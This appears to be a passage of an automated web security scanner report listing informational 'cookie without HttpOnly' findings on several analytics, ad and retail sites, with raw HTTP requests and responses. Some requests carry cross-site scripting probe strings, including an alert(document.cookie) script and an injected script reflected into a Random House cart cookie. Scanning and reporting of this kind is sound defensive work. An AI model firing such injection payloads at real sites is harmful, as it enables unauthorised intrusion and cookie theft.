P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ATV9=24872d151C6Ecc4MOc11B9UcU1c2EJc2VPSc14TAcc17TDccccccccc; expires=Fri, 29-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: CitiBTSES=SID=13D7DF0F117D48BD805FDC1B5FA0BA40; path=/
Set-Cookie: CitiBT%5F9=; expires=Fri, 20-Apr-2012 04:00:00 GMT; path=/
Set-Cookie: ASB9=TX=1303842974&Pb=961&A=0&SID=A1136F84AE884D07BD9C5F0C7597750E&Vn=2515&Ct=0&Pc=0&S=0&Cn=0&Pd=0&T=37802&Cr=98108&W=0&Tr=40877&Cp=4824&P=1092926&B=9; expires=Fri, 29-Apr-2011 04:00:00 GMT; path=/
Set-Cookie: CitiBT=GUID=51F9B64F96004506A0AF0C3CC3A64C45; expires=Fri, 20-Apr-2012 04:00:00 GMT; path=/
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close

GIF89a.............!.......,...........L..;

14.70. http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166?AQB=1&ndh=1&t=26/3/2011%2017%3A7%3A34%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=randomhouse&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: code.randomhouse.com

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 22:07:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DBA10E851D3D23-40000132600C21AF[CE]; Expires=Sun, 24 Apr 2016 22:07:25 GMT; Domain=.randomhouse.com; Path=/
Location: http://code.randomhouse.com/b/ss/ranhcorporate,ranhrollup/1/H.17/s79731434181166?AQB=1&pccr=true&vidn=26DBA10E851D3D23-40000132600C21AF&&ndh=1&t=26/3/2011%2017%3A7%3A34%202%20300&ns=randomhouse&pageName=cart&g=about%3Ablank&cc=USD&events=scView&c1=Random%20House%20Corporate&v12=randomhouse&s=1920x1200&c=16&j=1.5&v=Y&k=N&bw=1&bh=1&ct=lan&hp=Y&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 22:07:25 GMT
Last-Modified: Wed, 27 Apr 2011 22:07:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www347
Content-Length: 0
Content-Type: text/plain


14.71. http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://code.randomhouse.com
Path:   /b/ss/ranhrollup/1/H.22.1/s74779692005831

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/ranhrollup/1/H.22.1/s74779692005831?AQB=1&ndh=1&t=26%2F3%2F2011%2017%3A6%3A2%202%20300&ns=randomhouse&pageName=RH.com%20Homepage&g=http%3A%2F%2Fwww.randomhouse.com%2F&cc=USD&events=event8&c24=www.randomhouse.com%2F&v24=www.randomhouse.com%2F&c25=www.randomhouse.com%2F&v25=www.randomhouse.com%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: code.randomhouse.com
Proxy-Connection: keep-alive
Referer: http://www.randomhouse.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 22:05:53 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DBA0E0851D07B4-400001370000750B[CE]; Expires=Sun, 24 Apr 2016 22:05:53 GMT; Domain=.randomhouse.com; Path=/
Location: http://code.randomhouse.com/b/ss/ranhrollup/1/H.22.1/s74779692005831?AQB=1&pccr=true&vidn=26DBA0E0851D07B4-400001370000750B&&ndh=1&t=26%2F3%2F2011%2017%3A6%3A2%202%20300&ns=randomhouse&pageName=RH.com%20Homepage&g=http%3A%2F%2Fwww.randomhouse.com%2F&cc=USD&events=event8&c24=www.randomhouse.com%2F&v24=www.randomhouse.com%2F&c25=www.randomhouse.com%2F&v25=www.randomhouse.com%2F&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1095&bh=937&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Mon, 25 Apr 2011 22:05:53 GMT
Last-Modified: Wed, 27 Apr 2011 22:05:53 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www384
Content-Length: 0
Content-Type: text/plain


14.72. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1117&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZFFAbh=845B826,20|798_845#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|1117_846#366Z798_845#365;expires=Wed, 25 Apr 2012 18:46:37 GMT;domain=.zedo.com;path=/;
ETag: "1822b1a-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 2559125543
Cache-Control: max-age=44578
Expires: Wed, 27 Apr 2011 07:09:35 GMT
Date: Tue, 26 Apr 2011 18:46:37 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

14.73. http://data.cmcore.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?tid=17&ci=90223951&vn1=4.1.1&vn2=e4.0&ec=ISO-8859-1&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1&rand=110252757556736&cvdone=p HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=70091303843240316067555

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:40:50 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 90223951_login=1303843250018461671490223951; path=/
Set-Cookie: 90223951_reset=1303843250;path=/
Expires: Tue, 26 Apr 2011 00:40:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

14.74. http://ds.addthis.com/red/psi/sites/www.bertelsmann.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.bertelsmann.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.bertelsmann.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fwww.bertelsmann.com%2Fbertelsmann_corp%2Fwms41%2Fbm%2Findex.php%3Flanguage%3D2%2650700%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ee85a0f4245a%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F38&11jhoxa HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%7D..1303775135.1FE|1303775135.60; psc=4; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 186
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 26 Apr 2011 23:30:14 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 26 May 2011 23:30:14 GMT; Path=/
Set-Cookie: di=%7B%7D..1303775135.1FE|1303860614.1OD|1303775135.60; Domain=.addthis.com; Expires=Thu, 25-Apr-2013 23:30:14 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 26 Apr 2011 23:30:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 26 Apr 2011 23:30:14 GMT
Connection: close

_ate.ad.hpr({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dab4fa85facd099"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

14.75. http://ecommerce.randomhouse.com/cart.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ecommerce.randomhouse.com
Path:   /cart.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cart.do?from=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B6E)%3C/script%3E&addFlag=false&coupon=3&submit=Apply HTTP/1.1
Host: ecommerce.randomhouse.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; CP=null*; mbox=session#1303855598284-166145#1303859906|PC#1303855598284-166145#1366930046|check#true#1303858106; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:47:26 GMT
Server: Apache
Set-Cookie: rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; Domain=.randomhouse.com; Expires=Wed, 25-Apr-2012 22:47:27 GMT
Set-Cookie: rhcartitems=; Domain=.randomhouse.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 19741


<!-- shoppingCart.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

14.76. http://ehg-gaddispartners.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-gaddispartners.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM5710248PED62EN3&cd=1&hv=6&n=Setting%20MSN%20as%20your%20homepage&con=&vcon=/&tt=none&ja=y&dt=13&zo=300&lm=1290645554000&bn=Netscape&ce=y&ss=1920*1200&sc=16&sv=16&cy=u&hp=u&ln=en-US&np=Win32&nc=u&vpc=HBX0250u&vjs=HBX0250.11u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&ttt=lid,lpos,name&ra=&cv.c49=&cv.c50=http%3A//www.myhomemsn.com/&rf=bookmark&pu=&pl=Shockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.240.7%3AJava%28TM%29%20Platform%20SE%206%20U24%3ASilverlight%20Plug-In%3AChrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AWPI%20Detector%201.3%3AGoogle%20Update%3ADefault%20Plug-in%3A&lv.id=&lv.pos=&hid=0.7830267860554159 HTTP/1.1
Host: ehg-gaddispartners.hitbox.com
Proxy-Connection: keep-alive
Referer: http://www.myhomemsn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WSS_GW=V1z%XrXe@%r@Q; CTG=1303671314

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:38:58 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: DM5710248PEDV6=V1eB(#X"rz%XrXiCX%Xi%er%@rz%zrzr"%XrXiCX%Xiz%XrXiCX%Xi"%XrXiCX%Xi"%XrXiCX%Xi%er%@r"rz(xB$}aff2TWxBrl}#xBrIFxBr3:DhxBrO:maGIWaz7}z)OuKr6QizA6}aff2TWHl}#HIFH3:DhHO:maGIWazu::dmIhd; path=/; domain=ehg-gaddispartners.hitbox.com; expires=Wed, 25-Apr-2012 18:38:58 GMT; max-age=31536000
Set-Cookie: WSS_GW=V1z%XrXiCX%Xi; path=/; domain=.hitbox.com; expires=Wed, 25-Apr-2012 18:38:58 GMT; max-age=31536000
Set-Cookie: CTG=1303843138; path=/; domain=.hitbox.com; expires=Tue, 03-May-2011 18:38:58 GMT; max-age=604800
nnCoection: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Tue, 26 Apr 2011 18:38:59 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;

14.77. http://explore.live.com/Handlers/Plt.mvc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /Handlers/Plt.mvc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Handlers/Plt.mvc?bicild=&v=15.40.1075 HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/windows-live-messenger?os=other
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; wlidperf=throughput=13&latency=225; xid=ea42cfe4-9b1a-4293-9276-b9fa57650771&&TK2xxxxxxxxLP11&154; xidseq=1; mktstate=S=1623281324&U=&E=&P=&B=en-us; mkt1=norm=en-us; mkt2=marketing=en-us; wlexpid=ea42cfe4-9b1a-4293-9276-b9fa57650771; wlv=A|_-d:s*s449Bg.2+1+0+3; E=P:aEefTVjSzYg=:GbI7jyce+ASXkK6Lz5dzEj3wxAVVXrTJiiazZaS199c=:F; wla42=; cookiesEnabled=true; BP=VID=0.9254&VC=0&RC=1&LTT=1303843145271&l=WSC.Explore&FR=&ST=; LD=ea42cfe4-9b1a-4293-9276-b9fa57650771_0014ddf8c55_15501_1303843132949=L12308; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=31536000
Content-Length: 42
Content-Type: image/gif
Expires: Wed, 25 Apr 2012 18:39:09 GMT
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: E=P:y5dGXVjSzYg=:SNkzLa0DRaQJHW5nO0Gh5ui7VMJQkPzrYSKyCZ6j7C0=:F; domain=.live.com; path=/
Set-Cookie: pltmode=1; domain=.live.com; expires=Tue, 26-Apr-2011 18:39:19 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:39:09 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:39:09 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:39:08 GMT

GIF89a.............!.......,...........2.;

14.78. http://explore.live.com/windows-live-messenger  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /windows-live-messenger

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windows-live-messenger?os=other HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42292
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Set-Cookie: xid=42b3abd4-6447-433c-8c48-9965439b3738&&TK2xxxxxxxxLP11&154; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: mktstate=S=1623281324&U=&E=&P=&B=en-us; domain=.live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=.live.com; path=/
Set-Cookie: mkt2=marketing=en-us; domain=.explore.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 26-Apr-2011 16:58:38 GMT; path=/
Set-Cookie: wlexpid=42b3abd4-6447-433c-8c48-9965439b3738; domain=.live.com; expires=Tue, 26-Apr-2011 19:08:38 GMT; path=/
Set-Cookie: wlv=A|_-d:s*ro49Bg.2+1+0+3; domain=.live.com; path=/
Set-Cookie: E=P:dHXjSljSzYg=:lte5DPYyGosUE7/z2qmjFVvinU2K9vatIhifomCYPC4=:F; domain=.live.com; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 03-May-2011 18:38:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:38:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text
...[SNIP]...

14.79. http://freemanco.app5.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freemanco.app5.hubspot.com
Path:   /salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: freemanco.app5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.freemanco.com/freemanco/?fs=true&_requestid=118715
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 497
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=MtXOxR4jzQEkAAAAMDUzMzFjZDctNWUwZC00MWNiLWFkZTYtYTExNWI1YTJjNWQ10; expires=Wed, 25-Apr-2012 20:05:33 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=84c62207-a976-46ab-bd41-5aaf29a2d55f; domain=freemanco.app5.hubspot.com; expires=Mon, 26-Apr-2021 05:00:00 GMT; path=/; HttpOnly
Date: Tue, 26 Apr 2011 20:05:33 GMT
Set-Cookie: HUBSPOT159=219223212.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 28466;
var hsWeekEndsIn = 460466;
var hsMonthEndsIn = 374066;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-04-26 16:05:
...[SNIP]...

14.80. http://g.adspeed.net/ad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.adspeed.net
Path:   /ad.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad.php?do=imp&zid=14678&aid=43896&auth=925C7C05B5&wd=728&ht=90&tz=5&ck=Y&jv=Y&scr=1920x1200x16&ref=&uri=http%3A%2F%2Fseclists.org%2Ffulldisclosure%2F2011%2FApr%2F388&t=1303854570 HTTP/1.1
Host: g.adspeed.net
Proxy-Connection: keep-alive
Referer: http://g.adspeed.net/ad.php?do=html&zid=14678&wd=728&ht=90&target=_top&tz=5&ck=Y&jv=Y&scr=1920x1200x16&z=0.07491016224958003&ref=&uri=http%3A//seclists.org/fulldisclosure/2011/Apr/388
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://g.adspeed.net/w3c/p3p.xml", CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: impuniraw=43896-1303941099; expires=Thu, 26-May-2011 21:51:39 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Date: Tue, 26 Apr 2011 21:51:39 GMT
Server: AdSpeed/s8

GIF89a.............!.......,...........D..;

14.81. http://homestore.122.2o7.net/b/ss/movesyndication/1/H.2-pdv-2/s62061750586144  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://homestore.122.2o7.net
Path:   /b/ss/movesyndication/1/H.2-pdv-2/s62061750586144

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/movesyndication/1/H.2-pdv-2/s62061750586144?[AQB]&ndh=1&t=26/3/2011%2013%3A47%3A18%202%20300&ns=homestore&pageName=FAH%3AMSN%3A%20display%3Awidget&g=http%3A//www.realtor.com/search/widgetportal/Widget.aspx%3Fwname%3DMainSearchXSLContainer%26app%3D8bcac8850c63428982ba6b6b90c09cfa%26zip%3D75207&r=http%3A//realestate.msn.com/article.aspx%3Fcp-documentid%3D28280145&cc=USD&ch=FAH%3AMSN&events=event10&v10=FAH%3AMSN&c12=New%20York%2C%20NY&c13=FAH%3AMSN%3A%20display%3Awidget&c20=FAH%3AMSN%3A%20display%3Awidget&c21=RDC%3A%20FAH%3AMSN%3A%20display%3Awidget&v21=Realtor.com&c22=RDC%3A%20FAH%3AMSN&v22=RDC%3A%20FAH%3AMSN&c23=Realtor.com&v24=Not%20Registered&v25=RDC%3AArrowhead%3AB&c26=Not%20Registered&c27=www.realtor.com&c30=38.705&c38=RDC%3AArrowhead%3AB&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=300&bh=328&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: homestore.122.2o7.net
Proxy-Connection: keep-alive
